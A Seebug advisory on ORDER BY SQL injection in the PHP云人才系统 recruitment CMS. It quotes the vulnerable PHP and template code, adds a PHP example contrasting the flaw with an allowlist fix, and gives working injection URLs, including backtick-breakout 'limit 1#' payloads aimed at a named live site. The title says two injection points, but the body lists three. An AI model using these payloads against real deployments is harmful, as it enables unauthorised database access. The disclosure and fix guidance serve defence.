PHP云人才系统(20141229): SQL injection in two places

2015-01-07T00:00:00
ID SSV:93951
Type seebug
Reporter Root
Modified 2015-01-07T00:00:00

Description

Brief description:

Two hidden SQL injections in PHP云人才系统 (20141229).

Detailed description:

SQL injection points in PHP云人才系统.

0x01: Q&A home page
========================

URL:

http://www.hr135.com/ask/index.php?order=add_time

The order parameter is injectable. Look at the code in /include/libs/Smarty_Compiler.class.php:5330:

```php
5330 function _complie_qlist_start($tag_args)
5331 {
5332     $paramer = $this->_parse_attrs($tag_args);
5333     $item = str_replace("'","",$paramer[item]);
5334     global $db,$db_config,$config;
5335     $path = dirname(dirname(dirname(__FILE__)));
5336     $ParamerArr = $this->GetSmarty($paramer,$_GET);
5337     $paramer = $ParamerArr[arr];
5338     $Purl = $ParamerArr[purl];
5339
5340     $where=1;
5341     // sort column defaults to the post time
5342     if($paramer[order]){
5343         if($paramer[order]=="addtime"){
5344             $paramer[order]="add_time";
5345         }
5346         if($paramer[order]=="answernum"){
5347             $paramer[order]="answer_num";
5348         }
5349         $order = " ORDER BY `".$paramer[order]."` desc";   // user-controlled value placed inside backticks with no escaping
5350     }else{
5351         $order = " ORDER BY `add_time` desc";
5352     }
5353     if($paramer[cid]){
5354         $where .=" and `cid`='".$paramer[cid]."'";
5355     }
5356     if($paramer[uid]){
5357         $where .=" and `uid`='".$_COOKIE[uid]."'";
5358     }
5359     if($paramer[recom]){ // "recommended" flag
5360         $where .=" and `is_recom`='1'";
5361     }
5362     if($paramer[limit]){
5363         $limit=" limit ".$paramer[limit];
5364     }
5365     if($paramer[ispage]){
5366         $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2");
5367         //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2');
5368         //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl];
5369     }
5370     $rs = $db->select_all("question",$where.$order.$limit);
```

Line 5349 concatenates $paramer[order] straight into the SQL. The value is wrapped in backticks, but addslashes() does not escape the backtick, so a backtick in the parameter closes the original identifier and whatever follows it is executed as SQL. Now look at the call site, /ask/model/index.class.php:26:

```php
26 function index_action(){
27     $this->public_action();
28     $this->yunset("c","index");
29     $this->yunset("order",$_GET['order']);
30     $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids");
31     $my_atten=@explode(',',rtrim($my_attention['ids'],","));
32     $this->seo('ask_index');
33     $this->yunset("my_atten",$my_atten);
34     $this->wenda_tpl('index');
35 }
```

$this->yunset("order",$_GET['order']); passes order to the template variable @order with no filtering. Then in the template, template/ask/index.htm:15:

```html
15 {yun:}qlist item=qlist ispage=1 t_len=20 order=@order limit=10{/yun}
16 <div class="answers_left_list">
17     <div class="answers_left_list_left">
18         <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer">
19             <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);">
20         </div>
21     </div>
```

Line 15 hands @order to _complie_qlist_start().
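The following PHP is an added example, not PHPYun code and not part of the original report. It rebuilds the ORDER BY construction of lines 5342-5351 in isolation, runs the report's payload through addslashes() first (the report states that this filter leaves the backtick untouched), and places an allowlist-based version next to it. The function and constant names and the stand-in LIMIT clause are this example's own assumptions; the table and column names come from the code quoted above.

```php
<?php
// Added example (not PHPYun code, not from the original report).
// Rebuilds the ORDER BY construction of _complie_qlist_start()
// (Smarty_Compiler.class.php:5342-5351) and puts an allowlist-based
// version beside it. Function/constant names and the stand-in LIMIT
// clause are this example's own; table and column names follow the
// code quoted in the report.

// The report says input reaches line 5349 after addslashes(), which
// escapes ' " \ and NUL but leaves the backtick alone. Apply it here so
// the payload is seen exactly as the vulnerable code sees it.
function apply_addslashes(string $value): string
{
    return addslashes($value);
}

// Vulnerable shape, same logic as lines 5342-5351. $limit stands in for
// the clause PageNav() appends in the real code (assumed " limit 10").
function build_query_vulnerable(string $order, string $limit = ' limit 10'): string
{
    $where = 1;
    if ($order) {
        if ($order == 'addtime') {
            $order = 'add_time';
        }
        if ($order == 'answernum') {
            $order = 'answer_num';
        }
        $orderSql = " ORDER BY `" . $order . "` desc";   // backtick breakout happens here
    } else {
        $orderSql = " ORDER BY `add_time` desc";
    }
    return "SELECT * FROM `question` WHERE " . $where . $orderSql . $limit;
}

// Hardened: the request value is only a key into a fixed map of real
// columns; anything else falls back to the default sort, and the limit
// is an integer so it cannot carry a comment or an extra clause.
const QUESTION_ORDER_COLUMNS = [
    'addtime'    => 'add_time',
    'add_time'   => 'add_time',
    'answernum'  => 'answer_num',
    'answer_num' => 'answer_num',
];

function build_query_safe(string $order, int $limit = 10): string
{
    $column = QUESTION_ORDER_COLUMNS[$order] ?? 'add_time';
    return "SELECT * FROM `question` WHERE 1 ORDER BY `" . $column . "` desc limit " . $limit;
}

// Constructed input: the report's payload ?order=add_time`%20limit%201%23, URL-decoded.
$payload  = 'add_time` limit 1#';
$filtered = apply_addslashes($payload);

// The filtered value still contains the backtick and the '#', so in the
// vulnerable query MySQL sees `add_time` closed early, then "limit 1",
// then a '#' comment that swallows the original " desc" and LIMIT.
echo "after addslashes: ", $filtered, PHP_EOL;
echo "vulnerable:       ", build_query_vulnerable($filtered), PHP_EOL;
// The hardened builder never copies the request value into the SQL at
// all; the unknown key maps to the default column.
echo "hardened:         ", build_query_safe($filtered), PHP_EOL;
```

Run it with `php example.php`. The vulnerable builder emits a query whose ORDER BY clause ends in `` `add_time` limit 1#` desc limit 10 ``, and since `#` starts a comment in MySQL the server executes only `ORDER BY `add_time` limit 1`, which is exactly the single-row result shown in the screenshots below. The hardened builder emits `ORDER BY `add_time` desc limit 10` for the same input. Mapping request values through an allowlist is the fix to apply here; escaping cannot help because a column name is an identifier, not a string literal, and addslashes() was never designed to protect identifier quoting.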

http://www.hr135.com/ask/index.php?order=add_time`

SQL error, no data returned:

<img src="https://images.seebug.org/upload/201412/31110436a4657768661e09ae7cbde4699669d471.png" alt="1.png" width="600">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23

Returns one row (the `#` comments out the ` desc` and the LIMIT clause that the code appends after the injected value):

<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

Returns two rows:

<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600">

0x02: Job search page

URL:

http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a

The order parameter is injectable.

http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a

SQL error, no data returned:

<img src="https://images.seebug.org/upload/201412/31111717b98924fc04131718942a8a2b0a9f4894.png" alt="4.png" width="600">

http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a

Returns one row (this payload works without a closing backtick, so in this query the order value is evidently not backtick-quoted):

<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600">

http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

Returns two rows:

<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600">

0x03: Recruiter ("hire talent") home page

URL:

http://www.hr135.com/index.php?m=user&order=status_time

The order parameter is injectable.

http://www.hr135.com/index.php?m=user&order=status_time`

SQL error, no data returned:

<img src="https://images.seebug.org/upload/201412/31112936e0b5414d133e5a7955aeba0109c85527.png" alt="7.png" width="600">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23

Returns one row:

<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

Returns two rows:

<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600">

Proof of vulnerability:

<img src="https://images.seebug.org/upload/201412/31110518d0a5b66fcb9e386a551d23b6df10be16.png" alt="2.png" width="600">

http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

Returns two rows:

<img src="https://images.seebug.org/upload/201412/3111052820c2a5dedf4ad9e010a75288b9440f86.png" alt="3.png" width="600">

<img src="https://images.seebug.org/upload/201412/311117251efd73b13125a12107557993b9de78ec.png" alt="5.png" width="600">

http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

Returns two rows:

<img src="https://images.seebug.org/upload/201412/31111731295c1689a8b114f5538c7196f8dcf885.png" alt="6.png" width="600">

<img src="https://images.seebug.org/upload/201412/31112945a30c0544f50262eea80edbb8ad671c5b.png" alt="8.png" width="600">

http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

Returns two rows:

<img src="https://images.seebug.org/upload/201412/311129539c94289a19b8ab9ecf4a8f67c969734f.png" alt="9.png" width="600">